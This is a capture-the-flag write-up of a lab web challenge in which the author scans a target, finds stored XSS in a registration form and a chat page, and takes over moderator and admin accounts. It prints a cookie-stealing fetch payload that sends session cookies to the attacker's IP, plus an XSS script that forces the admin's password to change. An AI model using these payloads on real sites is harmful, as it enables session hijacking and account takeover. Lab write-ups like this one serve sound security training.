WhatsYourName?

0254932ccf694e3c8ed3caf393b20fbe.png

Target IP: 10.10.13.206
Challenge Description:

761529816393c604f3210cf166c8f024.png


Reconnaissance

12e01f85f5954552558c4bf3355a7a08.png
This challenge requires me to add the hostname worldwap.thm inside my /etc/hosts file first. After doing this, I ran a TCP port scan using the command sudo nmap -sS worldwap.thm -p- and identified there are three ports open on the target machine: SSH, HTTP, and another HTTP application on port 8081, as shown above.

47ff5dea9f230f4cd158c3fe53e61b50.png
After identifying three applications on the target machine, I performed an aggressive port scan against the three ports using the command sudo nmap -sV -A worldwap.thm -p 22,80,8081, as shown above. After this port scan, I obtained the result shown above. Since the challenge is to attack the web application via XSS/CSRF, time to enumerate the web applications.


Enumeration

Port 80: HTTP
fb53af5a2bb923d1a32d36f1e7041509.png
Browsing to http://worldwap.thm returns the webpage shown above. I notice there is a Register button on the top of the web application.

4d366da03bf437a23db5f1cf9688c74d.png
The registeration webpage above is returned to me after pressing the Register button from the previous image. Right away, I notice the information message You can now pre-register! Your details will be reviewed by the site moderator.. Maybe I can perform XSS attack here, as the input details are checked by the moderator team. Maybe I can try to obtain the cookie of the moderator?

87e3cbaeb8608a9eae9c3f535d50abaf.png
To test if the web application is vulnerable to XSS/CSRF attacks, I started a Python HTTP server on my machine using the command python3 -m http.server 80. Then I injected the payload <script>fetch("http://10.14.55.153/");</script> inside the different parameters.


Exploitation via XSS (Moderator to Admin Privilege Escalation on the Web Application)

e19decc0d324dc5d6c1c664de3689da8.png
After some manual testing, I noticed the parameter Name is vulnerable as I received the HTTP request made by the target machine to my machine on port 80. Now I can use the modified payload <script>fetch("http://10.14.55.153/" + btoa(document.cookie));</script> to obtain the cookie of the moderator of the website :)

f576b7a02097096433f6442587ccfab0.png
And bingo! I registered using the details shown above. I inserted the cookie stealing payload <script>fetch("http://10.14.55.153/" + btoa(document.cookie));</script> inside the Name parameter and obtained the cookie of the user moderator as shown above.

d7cd3c8e93209befcfb6fa3197fbc8fc.png
After decoding this value using the Decoder tool offered by the Burp Suite, I obtained the result PHPSESSID=vegc1vmobcp87r0vdjuumhapvo as shown above. Now I can use the cookie vegc1vmobcp87r0vdjuumhapvo to gain access to the web application as the moderator.

4235bb2b7b564d957d51a533c138d290.png
I modified the PHPSESSID parameter to vegc1vmobcp87r0vdjuumhapvo directly on the web browser, as shown above.

37b9f436ed9db56af72e6580cd406b24.png
After modifying the cookie value to the moderator's cookie value, I refreshed the webpage and obtained the result shown above. Now I have access to the web application as the moderator :) However, I did not find anything useful here. However, from previous enumeration when I tried to register as a user I identified the hostname login.worldwap.thm. Since I have moderator access on the web application, maybe I can access this web application as this same user too?

b7d1169ec77cf894956cd7c4d875080d.png
And bingo! Now I have access to the other web application as the moderator. I notice it is possible to change password. Maybe I can force to change the password of the user admin? There is also a chat application.

cd26d0f0f26c0840d1a489ecc121684c.png
The chat application webpage is shown above. It can be used to talk to the admin? Maybe I can perform XSS attack here too?

424d5c67b39987d535cda9df6c5d63fd.png
I used the payload <script>alert(1);</script> first.

f14aca5bdc490bef6c9183a99d49bfb1.png
And yep. The chat application is vulnerable to XSS as the alert function was executed successfully. Time to test the Change Password functionality too.

f006d15e66020be4b1fe91f667e6649a.png
I ran Burp Suite and changed the password of the user moderator to password, as shown above. When I intercepted the HTTP request, I notice there is one parameter called new_password where the password is sent in plaintext. I can force the admin user to change password.

8d4e60c085b16076630c914bd8ce40cb.png
To accomplish this, I used the Change Password functionality again as shown above on the web browser. Then I copied the result of POST request using Copy as Fetch, as shown above. Then I will need to modify the request parameters to force the password reset. The new script is shown above. I will need to deploy the following script inside the chat application to force reset the password of the user admin to password:

<script>fetch("/change_password.php", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1"
    },
    "referrer": "/change_password.php",
    "body": "new_password=password",
    "method": "POST",
    "mode": "cors"
});</script>
<script>fetch("/change_password.php", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1"
    },
    "referrer": "/change_password.php",
    "body": "new_password=password",
    "method": "POST",
    "mode": "cors"
});</script>

d135b4824eee3d2207465a6873376ef1.png
And after logging out of the web application as the moderator, I used the credentials admin:password to login and gained access to the web application as the admin. GG :)